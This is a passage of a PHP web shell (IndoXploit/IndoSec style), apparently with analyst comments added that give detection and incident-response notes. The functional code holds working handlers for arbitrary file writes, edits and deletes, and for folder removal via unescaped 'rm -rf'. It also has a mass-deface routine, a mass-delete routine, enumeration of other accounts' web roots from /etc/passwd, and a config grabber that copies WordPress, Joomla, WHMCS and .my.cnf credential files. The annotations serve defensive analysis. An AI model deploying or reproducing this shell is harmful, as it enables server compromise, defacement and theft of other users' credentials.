  // Prints a form with one or more file-name fields and a content box. On POST "bikin"
  // every name in nama_file[] is opened for writing, relative to the working directory
  // chosen through GET "dir", and the submitted content is written to it. Names are
  // used as given and the handles are not closed explicitly. The dialog reflects only
  // the result for the last name in the list.
  // Detection: POSTs with aksi=buat_file and new or truncated files in the web root.
  587. if ($_GET['aksi'] == 'buat_file') {
  588. echo "<h4><img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img> Buat File :</h4>
  589. <form method='POST'>
  590. <div class='input-group'>
  591. <input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'>
  592. <div class='input-group-prepend'>
  593. <div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div>
  594. </div>
  595. </div><br/>
  596. <div id='output'></div>
  597. <textarea name='isi_file' class='form-control' rows='13' placeholder='Isi File...'></textarea><br/>
  598. <input type='submit' class='btn btn-info btn-block' name='bikin' value='Buat'>
  599. </form>";
  600.  
  601. if (isset($_POST['bikin'])) {
  602. $name = $_POST['nama_file'];
  603. $isi_file = $_POST['isi_file'];
  604. foreach ($name as $nama_file) {
  605. $handle = @fopen("$nama_file", "w");
  // With empty content the open handle itself serves as the success value.
  606. if($isi_file){
  607. $buat = @fwrite($handle, $isi_file);
  608. }else{
  609. $buat = $handle;
  610. }
  611. }
  612. if ($buat) {
  613. $swa = "success";
  614. $text = "Berhasil Membuat File";
  615. swall($swa,$text,$dir);
  616. }else{
  617. $swa = "error";
  618. $text = "Gagal Membuat File";
  619. swall($swa,$text,$dir);
  620. }
  621. }
  622. }
  623. /*
  624. View
  625. */
  // Prints the action links for the file and its contents in a disabled textarea. The
  // contents are HTML-escaped; $dir and $file in the links are not. Like the download
  // action, this can read any path the PHP process can open.
  626. if($_GET['aksi'] == 'view') {
  627. echo '[ <a class="active" href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]
  628. <h5>'.$imgfile.' Lihat File : '.$nfile.'</h5>
  629. <textarea rows="13" class="form-control" disabled="">'.htmlspecialchars(@file_get_contents($file)).'</textarea><br/>';
  630. }
  631. /*
  632. Edit
  633. */
  // Shows the file in an editable textarea and, on POST "edit_file", reopens GET "file"
  // in write mode (truncating it) and writes POST "isi" into it. The handle is not
  // closed explicitly.
  // Detection: POSTs with aksi=edit, and content or mtime changes on existing files,
  // which file-integrity monitoring of the web root will surface.
  634. if($_GET['aksi'] == 'edit') {
  635. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
  636. echo "<form method='POST'>
  637. <h5>$imgfile Edit File : $nfile</h5>
  638. <textarea rows='13' class='form-control' name='isi'>".htmlspecialchars(@file_get_contents($file))."</textarea><br/>
  639. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>
  640. </form>";
  641.  
  642. if(isset($_POST['edit_file'])) {
  643. $updt = fopen("$file", "w");
  644. $hasil = fwrite($updt, $_POST['isi']);
  645.  
  646. if ($hasil) {
  647. $swa = "success";
  648. $text = "Berhasil Update File";
  649. swall($swa,$text,$dir);
  650. }else{
  651. $swa = "error";
  652. $text = "Gagal Update File";
  653. swall($swa,$text,$dir);
  654. }
  655. }
  656. }
  657. /*
  658. Rename
  659. */
  // Shows a rename form for GET "file". On POST "rename_file", $lama ("old") is the
  // current path and $baru ("new") the submitted name, taken as given.
  660. if($_GET['aksi'] == 'rename') {
  661. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
  662. echo "<form method='POST'>
  663. <h5>$imgfile Rename File : $nfile</h5>
  664. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nfile'><br/>
  665. <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Rename</button>
  666. </form>";
  667.  
  668. if(isset($_POST['rename_file'])) {
  669. $lama = $file;
  670. $baru = $_POST['namanew'];
  // As written, the first call moves anything already at the new name onto the current
  // path; the existence check and the actual rename only come afterwards.
  671. rename( $baru, $lama);
  672. if(file_exists($baru)) {
  673. $swa = "success";
  674. $text = "Nama $baru Telah Digunakan";
  675. swall($swa,$text,$dir);
  676. }else{
  677. if(rename( $lama, $baru)) {
  678. $swa = "success";
  679. $text = "Berhasil Mengganti Nama Menjadi $baru";
  680. swall($swa,$text,$dir);
  681. }else{
  682. $swa = "error";
  683. $text = "Gagal Mengganti Nama";
  684. swall($swa,$text,$dir);
  685. }
  686. }
  687. }
  688. }
  689. /*
  690. Delete File
  691. */
  // Asks for confirmation ("Ya" = yes, "Tidak" = no) and, when POST "ya" is set, deletes
  // GET "file" with unlink(). The path is used as given.
  // Detection: POSTs with aksi=hapusf, and files disappearing from the web root.
  692. if ($_GET['aksi'] == 'hapusf') {
  693. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
  694. echo "
  695. <div class='card card-body text-center text-dark mb-4'>
  696. <p>Yakin Menghapus : $nfile</p>
  697. <form method='POST'>
  698. <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
  699. <input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'>
  700. </form>
  701. </div>";
  702.  
  703. if ($_POST['ya']) {
  704. if (unlink($file)) {
  705. $swa = "success";
  706. $text = "Berhasil Menghapus File";
  707. swall($swa,$text,$dir);
  708. }else{
  709. $swa = "error";
  710. $text = "Gagal Menghapus File";
  711. swall($swa,$text,$dir);
  712. }
  713. }
  714. }
  // Base name of the working directory, used for display by the folder actions.
  715. $ndir = basename($dir);
  716. //chmod
  // Shows the current mode of GET "dir" (last four octal digits) in a form and, on
  // POST "chmo", calls chmod() on that directory with the submitted "perm" value.
  // NOTE(review): as with the file variant, the form value reaches chmod() as a string,
  // so the resulting mode bits may not match what was typed — confirm on a sample.
  717. if($_GET['aksi'] == 'chmod_dir') {
  718. $ndir = basename($dir);
  719. echo "<form method='POST'>
  720. <h5>Chmod Folder : $ndir </h5>
  721. <div class='form-group input-group'>
  722. <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['dir'])), -4)."'>
  723. <input type='submit' class='btn btn-danger form-control' value='Chmod' name='chmo'>
  724. </div>
  725. </form>";
  726. if(isset($_POST['chmo'])){
  727. if(@chmod($_GET['dir'],$_POST['perm'])){
  728. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  729. }else{
  730. echo '<font color="white">Change Permission Gagal</font><br/>';
  731. }
  732. }
  733. }
  734. /*
  735. Add Folder
  736. */
  // Prints a form with one or more folder-name fields. On POST "buat" every name in
  // nama_folder[] is filtered and passed to mkdir(), relative to the working directory
  // chosen through GET "dir". The dialog reflects only the result for the last name.
  737. if ($_GET['aksi'] == 'buat_folder' ) {
  738. echo "
  739. <h4>$imgfol Buat Folder :</h4>
  740. <form method='POST'>
  741. <div class='input-group'>
  742. <input type='text' class='form-control' name='nama_folder[]' placeholder='Nama Folder...'>
  743. <div class='input-group-prepend'>
  744. <div class='input-group-text'><a id='add_input1'><i class='fa fa-plus'></i></a></div>
  745. </div>
  746. </div><br/>
  747. <div id='output1'></div>
  748. <input type='submit' class='btn btn-info btn-block' name='buat' value='Buat'>
  749. </form>";
  750.  
  751. if (isset($_POST['buat'])) {
  752. $nama = $_POST['nama_folder'];
  753. foreach ($nama as $nama_folder) {
  // Strips every character outside the allowed set, plus any run of two or more dots;
  // path separators are not in the allowed set, so they are removed from the name.
  754. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder);
  755. $fd = @mkdir ($folder);
  756. }
  757. if ($fd) {
  758. $swa = "success";
  759. $text = "Berhasil Membuat Folder";
  760. swall($swa,$text,$dir);
  761. }else{
  762. $swa = "error";
  763. $text = "Gagal Membuat Folder";
  764. swall($swa,$text,$dir);
  765. }
  766. }
  767. }
  768.  
  769. /*
  770. Rename Folder
  771. */
  // Shows a rename form for the working directory and, on POST "ganti" ("change"),
  // renames it to "<parent>/<new name>". The new name is passed through
  // htmlspecialchars() before use, which is HTML escaping and not a path check.
  // The request always ends here. $nama in the form's value attribute is only assigned
  // in the create-folder branch, so it is normally unset at this point.
  772. if ($_GET['aksi'] == 'rename_folder' ) {
  773. echo "
  774. [ <a href='?dir=".$dir."&aksi=rename_folder' class='active'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]
  775. <h4>$imgfol Rename Folder : $ndir </h4>
  776. <form method='POST'>
  777. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nama'><br/>
  778. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
  779. </form>";
  780.  
  781. if(isset($_POST['ganti'])) {
  782. $baru = htmlspecialchars($_POST['namanew']);
  783. $ubah = rename($dir, "".dirname($dir)."/".$baru."");
  784. if($ubah) {
  785. $swa = "success";
  786. $text = "Berhasil Mengganti Nama";
  787. $dir = dirname($dir);
  788. swall($swa,$text,$dir);
  789. }else{
  790. $swa = "error";
  791. $text = "Gagal Mengganti Nama";
  792. $dir = dirname($dir);
  793. swall($swa,$text,$dir);
  794. }
  795. }
  796. exit;
  797. }
  798.  
  799. /*
  800. Delete Folder
  801. */
  // Asks for confirmation and, when POST "ya" is set and the working directory exists
  // and is writable, removes it three ways in a row: rmdir(), then the shell commands
  // "rm -rf" and "rmdir /s /q" through exe(). $dir comes from GET "dir" and is placed
  // into both command lines without quoting or escaping. The not-writable branch shows
  // an "error" dialog with the same "Berhasil Menghapus" text. The request always ends
  // here.
  // Detection: POSTs with aksi=hapus_folder, and process-creation telemetry showing
  // these delete commands started by the web-server/PHP user.
  802. if ($_GET['aksi'] == 'hapus_folder' ) {
  803. echo "
  804. [ <a href='?dir=".$dir."&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder' class='active'>Delete</a> ]
  805. <div class='card card-body text-center text-dark mb-4'>
  806. <p>Apakah Yakin Menghapus : $ndir ?</p>
  807. <form method='POST'>
  808. <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
  809. <input type='submit' name='ya' class='btn btn-success btn-block' value='Ya'>
  810. </form>
  811. </div><br/>";
  812.  
  813. if ($_POST['ya']) {
  814. if(is_dir($dir)) {
  815. if(is_writable($dir)) {
  816. @rmdir($dir);
  817. @exe("rm -rf $dir");
  818. @exe("rmdir /s /q $dir");
  819. $swa = "success";
  820. $text = "Berhasil Menghapus";
  821. $dir = dirname($dir);
  822. swall($swa,$text,$dir);
  823. } else {
  824. $swa = "error";
  825. $text = "Berhasil Menghapus";
  826. $dir = dirname($dir);
  827. swall($swa,$text,$dir);
  828. }
  829. }
  830. }
  831. exit;
  832. }
  833.  
  834.  
  835. /*
  836. * Fungsi_Tambahan (additional functions)
  837. *
  838. *
  839. * Mass Deface
  840. * IndoXploit
  841. */
  /*
   * Web-shell handler for aksi=masdef ("mass deface") (analyst annotation).
   * Takes a start directory (`d_dir`), a file name (`d_file`) and file content
   * (`script`) from the POST body and writes that content under that name into
   * many directories at once. The radio field `tipe` selects the variant:
   * "mahal" calls tipe_massal() (recursive), "murah" calls tipe_biasa() (one
   * level). All three values are used exactly as submitted.
   * Incident-response notes: the same file name with identical content and
   * near-identical modification times across many directories is the footprint
   * of this handler; existing files of that name are overwritten, so recovery
   * needs a known-good backup or integrity baseline rather than manual review.
   */
  842. if($_GET['aksi'] == 'masdef') {
  /*
   * Recursive variant. For a writable $dir it writes $isi_script to $namafile
   * in $dir itself (via the "." entry), in the parent of $dir (via the ".."
   * entry) and in every writable subdirectory, then descends into each of
   * those subdirectories. Prints one "Done > path" line per subdirectory.
   * Returns nothing; results of file_put_contents() are not checked.
   */
  843. function tipe_massal($dir,$namafile,$isi_script) {
  844. if(is_writable($dir)) {
  845. $dira = scandir($dir);
  846. foreach($dira as $dirb) {
  847. $dirc = "$dir/$dirb";
  848. $lokasi = $dirc.'/'.$namafile;
  849. if($dirb === '.') {
  850. file_put_contents($lokasi, $isi_script);
  851. } elseif($dirb === '..') {
  // ".." resolves to the parent, so the write also lands one level above $dir.
  852. file_put_contents($lokasi, $isi_script);
  853. } else {
  854. if(is_dir($dirc)) {
  855. if(is_writable($dirc)) {
  856. echo "Done > $lokasi\n";
  857. file_put_contents($lokasi, $isi_script);
  858. $masdef = tipe_massal($dirc,$namafile,$isi_script);
  859. }
  860. }
  861. }
  862. }
  863. }
  864. }
  865.  
  /*
   * Single-level variant: same writes as tipe_massal() for ".", ".." and each
   * writable direct subdirectory of $dir, without descending further.
   */
  866. function tipe_biasa($dir,$namafile,$isi_script) {
  867. if(is_writable($dir)) {
  868. $dira = scandir($dir);
  869. foreach($dira as $dirb) {
  870. $dirc = "$dir/$dirb";
  871. $lokasi = $dirc.'/'.$namafile;
  872. if($dirb === '.') {
  873. file_put_contents($lokasi, $isi_script);
  874. } elseif($dirb === '..') {
  875. file_put_contents($lokasi, $isi_script);
  876. } else {
  877. if(is_dir($dirc)) {
  878. if(is_writable($dirc)) {
  879. echo "Done > $dirb/$namafile\n";
  880. file_put_contents($lokasi, $isi_script);
  881. }
  882. }
  883. }
  884. }
  885. }
  886. }
  887.  
  // Form submitted: run the selected variant and show its "Done >" output in a
  // read-only textarea. Otherwise render the input form.
  888. if($_POST['start']) {
  889. echo "[ <a href='?dir=$dir'>Kembali</a> ]
  890. <textarea class='form-control' rows='13' disabled=''>";
  891. if($_POST['tipe'] == 'mahal') {
  892. tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  893. } elseif($_POST['tipe'] == 'murah') {
  894. tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  895. }
  896. echo "</textarea><br/>";
  897. } else {
  898. echo "<form method='post'>
  899. <center>
  900. <h5>Tipe :</h5>
  901. <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
  902. <label for='toggle-on' class='butn'>Biasa</label>
  903. <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
  904. <label for='toggle-off' class='butn'>Masal</label>
  905. </center>
  906. <h5>$imgfol Lokasi :</h5>
  907. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
  908. <h5>$imgfile Nama File :</h5>
  909. <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
  910. <h5>$imgfile Isi File :</h5>
  911. <textarea name='script' class='form-control' rows='13' placeholder='[Ex] Hacked By { IndoSec }'></textarea><br/>
  912. <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
  913. </form>";
  914. }
  915. exit;
  916. }
  917.  
  918.  
  919. /*
  920. * mass delete
  921. * IndoXploit
  922. */
  /*
   * Web-shell handler for aksi=masdel ("mass delete") (analyst annotation).
   * Takes a start directory (`d_dir`) and a file name (`d_file`) from the POST
   * body and removes files of that name across a directory tree through
   * hapus_massal(). Both values are used exactly as submitted.
   * Forensic caveat: the "Terhapus" ("deleted") lines in the output list every
   * writable subdirectory that was visited; they are printed before unlink()
   * is called and without checking its result, so they do not prove that a
   * file existed or was removed there.
   */
  923. if($_GET['aksi'] == 'masdel') {
  /*
   * Recursively unlinks $namafile: in $dir (via the "." entry, if the file
   * exists), in the parent of $dir (via "..", if it exists) and in every
   * writable subdirectory, descending into each one. Returns nothing.
   */
  924. function hapus_massal($dir,$namafile) {
  925. if(is_writable($dir)) {
  926. $dira = scandir($dir);
  927. foreach($dira as $dirb) {
  928. $dirc = "$dir/$dirb";
  929. $lokasi = $dirc.'/'.$namafile;
  930. if($dirb === '.') {
  931. if(file_exists("$dir/$namafile")) {
  932. unlink("$dir/$namafile");
  933. }
  934. } elseif($dirb === '..') {
  935. if(file_exists("".dirname($dir)."/$namafile")) {
  936. unlink("".dirname($dir)."/$namafile");
  937. }
  938. } else {
  939. if(is_dir($dirc)) {
  940. if(is_writable($dirc)) {
  // $lokasi is a path string, so this test is about the string, not about
  // whether the file exists on disk.
  941. if($lokasi) {
  942. echo "$lokasi > Terhapus\n";
  943. unlink($lokasi);
  944. $massdel = hapus_massal($dirc,$namafile);
  945. }
  946. }
  947. }
  948. }
  949. }
  950. }
  951. }
  952.  
  // Form submitted: run the deletion and show its output; otherwise render the form.
  953. if($_POST['start']) {
  954. echo "[ <a href='?dir=$dir'>Kembali</a> ]
  955. <textarea class='form-control' rows='13' disabled=''>";
  956. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  957. echo "</textarea><br/>";
  958. } else {
  959. echo "<form method='post'>
  960. <h5>$imgfol Lokasi :</h5>
  961. <input type='text' name='d_dir' value='$dir' class='form-control'><br/>
  962. <h5>$imgfile Nama File :</h5>
  963. <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
  964. <input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'>
  965. </form>";
  966. }
  967. exit;
  968. }
  969.  
  970.  
  971. /*
  972. * Jumping
  973. * IndoXploit
  974. */
  /*
   * Web-shell handler for aksi=jumping (analyst annotation).
   * Enumerates other accounts' web roots on the same host and prints, for each
   * one the current process can read, a link marked [R] or [RW]. Which layout
   * is probed depends on the current path in $dir:
   *   - path contains "hsphere": /hsphere/local/home/USER/DOMAIN
   *   - path contains "vhosts":  /var/www/vhosts/DOMAIN/httpdocs
   *   - otherwise:               /home/USER/public_html
   * User names come from /etc/passwd; domain names come from the posted `url`
   * list, from a sites.txt file, or from /etc/named.conf with /etc/valiases.
   * $dir, $ip and bing() are defined outside this excerpt.
   * Defensive reading: every [R]/[RW] line is a directory that is readable or
   * writable across account boundaries by the web-server user. Per-account
   * isolation (separate PHP users, restrictive home-directory permissions,
   * open_basedir) is what makes this listing come back empty.
   */
  975. if($_GET['aksi'] == 'jumping') {
  // $i counts the readable directories found.
  976. $i = 0;
  977. echo "<div class='card container'>";
  978. if(preg_match("/hsphere/", $dir)) {
  // Posted domain list, one entry per CRLF-separated line.
  979. $urls = explode("\r\n", $_POST['url']);
  980. if(isset($_POST['jump'])) {
  981. echo "<pre>";
  982. foreach($urls as $url) {
  983. $url = str_replace(array("http://","www."), "", strtolower($url));
  // /etc/passwd is re-read for every domain; the first colon-separated field
  // of each line is taken as the account name.
  984. $etc = "/etc/passwd";
  985. $f = fopen($etc,"r");
  986. while($gets = fgets($f)) {
  987. $pecah = explode(":", $gets);
  988. $user = $pecah[0];
  989. $dir_user = "/hsphere/local/home/$user";
  990. if(is_dir($dir_user) === true) {
  991. $url_user = $dir_user."/".$url;
  992. if(is_readable($url_user)) {
  993. $i++;
  994. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  995. if(is_writable($url_user)) {
  996. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  997. }
  998. echo $jrw."<br>";
  999. }
  1000. }
  1001. }
  1002. }
  // "Total ada N Kamar di IP" = "N rooms in total on IP"; printed only when N > 0.
  1003. if($i == 0) {
  1004. } else {
  1005. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1006. }
  1007. echo "</pre>";
  1008. } else {
  // No submission yet: pre-fill the form with the contents of the sites.txt file.
  1009. echo '<center>
  1010. <form method="post">
  1011. List Domains: <br>
  1012. <textarea name="url" class="form-control">';
  1013. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1014. while($getss = fgets($fp)) {
  1015. echo $getss;
  1016. }
  1017. echo '</textarea><br>
  1018. <input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
  1019. </form></center>';
  1020. }
  1021. } elseif(preg_match("/vhosts/", $dir)) {
  1022. $urls = explode("\r\n", $_POST['url']);
  1023. if(isset($_POST['jump'])) {
  1024. echo "<pre>";
  1025. foreach($urls as $url) {
  // Each posted domain is placed into the path unchanged.
  1026. $web_vh = "/var/www/vhosts/$url/httpdocs";
  1027. if(is_dir($web_vh) === true) {
  1028. if(is_readable($web_vh)) {
  1029. $i++;
  1030. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  1031. if(is_writable($web_vh)) {
  1032. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  1033. }
  1034. echo $jrw."<br>";
  1035. }
  1036. }
  1037. }
  1038. if($i == 0) {
  1039. } else {
  1040. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1041. }
  1042. echo "</pre>";
  1043. } else {
  1044. echo '<center>
  1045. <form method="post">
  1046. List Domains: <br>
  1047. <textarea name="url" class="form-control">';
  // bing() is defined outside this excerpt; presumably it prints domains found
  // for the server's IP through a search query -- confirm against its definition.
  1048. bing("ip:$ip");
  1049. echo '</textarea><br>
  1050. <input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
  1051.  
  1052. </form></center>';
  1053. }
  1054. } else {
  // Default layout: runs immediately, no form submission needed.
  1055. echo "<pre>";
  1056. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
  1057. while($passwd = fgets($etc)) {
  1058. if($passwd == '' || !$etc) {
  1059. echo "<font color=red>Can't read /etc/passwd</font><br/>";
  1060. } else {
  // Account name = text before ":x:" on the passwd line.
  1061. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1062. foreach($user_jumping[1] as $user_pro_jump) {
  1063. $user_jumping_dir = "/home/$user_pro_jump/public_html";
  1064. if(is_readable($user_jumping_dir)) {
  1065. $i++;
  1066. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  1067. if(is_writable($user_jumping_dir)) {
  1068. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  1069. }
  1070. echo $jrw;
  // Domain lookup: zone names are taken from /etc/named.conf and the owner of
  // /etc/valiases/ZONE is compared with the account name; the first match is printed.
  1071. if(function_exists('posix_getpwuid')) {
  1072. $domain_jump = file_get_contents("/etc/named.conf");
  1073. if($domain_jump == '') {
  // "gabisa ambil nama domain nya" = "cannot get the domain name".
  1074. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1075. } else {
  1076. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1077. foreach($domains_jump[1] as $dj) {
  1078. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1079. $user_jumping_url = $user_jumping_url['name'];
  1080. if($user_jumping_url == $user_pro_jump) {
  1081. echo " => ( <u>$dj</u> )<br>";
  1082. break;
  1083. }
  1084. }
  1085. }
  1086. } else {
  1087. echo "<br>";
  1088. }
  1089. }
  1090. }
  1091. }
  1092. }
  1093. if($i == 0) {
  1094. } else {
  1095. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1096. }
  1097. echo "</pre>";
  1098. }
  1099. echo "</div><br/>";
  1100. exit;
  1101. }
  1102.  
  1103. /*
  1104. Config
  1105. */
  /*
   * Web-shell handler for aksi=config (analyst annotation).
   * Collects application configuration files belonging to other accounts on the
   * host. Without a POST body it shows a form whose textarea is pre-filled with
   * the contents of /etc/passwd. With a POST body it:
   *   1. creates the directory indosec_config (mode 0777) relative to the
   *      current working directory and writes an .htaccess file into it;
   *   2. extracts account names from the posted `passwd` text (text before ":x:");
   *   3. for every account whose /home/USER/public_html/ is readable, tries each
   *      path in $grab_config and copies any non-empty file to
   *      indosec_config/USER-LABEL.txt.
   * Incident-response notes: a directory named indosec_config holding
   * USER-LABEL.txt files is a direct indicator that this handler ran. Each
   * such file is a copy of a configuration file (the list covers common CMS,
   * forum, shop and billing applications plus ~/.my.cnf), so any credentials
   * inside them should be treated as exposed and rotated for the named account.
   * Files that are only readable by their owning account are not reachable by
   * this routine, which reads with the privileges of the PHP process.
   */
  1106. if($_GET['aksi'] == 'config') {
  1107. if($_POST){
  1108. $passwd = $_POST['passwd'];
  1109. mkdir("indosec_config", 0777);
  // NOTE(review): the string is written to .htaccess exactly as it appears here;
  // the intent appears to be relaxing access rules for the directory -- confirm
  // how the web server interprets it.
  1110. $isi_htc = "Options allnRequire NonenSatisfy Any";
  1111. $htc = fopen("indosec_config/.htaccess","w");
  1112. fwrite($htc, $isi_htc);
  1113. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1114. foreach($user_config[1] as $user_con) {
  1115. $user_config_dir = "/home/$user_con/public_html/";
  1116. if(is_readable($user_config_dir)) {
  // Map of candidate file path => label used in the output file name. Where the
  // same path appears more than once, PHP keeps a single entry for that key.
  1117. $grab_config = array(
  1118. "/home/$user_con/.my.cnf" => "cpanel",
  1119. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
  1120. "/home/$user_con/public_html/forum/config.php" => "phpBB",
  1121. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
  1122. "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
  1123. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
  1124. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
  1125. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
  1126. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
  1127. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
  1128. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
  1129. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
  1130. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
  1131. "/home/$user_con/public_html/inc/config.php" => "MyBB",
  1132. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
  1133. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
  1134. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
  1135. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
  1136. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
  1137. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
  1138. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
  1139. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
  1140. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
  1141. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
  1142. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
  1143. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
  1144. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
  1145. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
  1146. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
  1147. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
  1148. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
  1149. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
  1150. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
  1151. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
  1152. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
  1153. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
  1154. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
  1155. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
  1156. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
  1157. "/home/$user_con/public_html/configuration.php" => "Joomla",
  1158. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
  1159. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
  1160. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
  1161. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
  1162. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
  1163. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
  1164. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
  1165. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
  1166. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
  1167. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
  1168. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
  1169. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
  1170. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
  1171. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
  1172. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
  1173. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
  1174. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
  1175. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  1176. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  1177. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
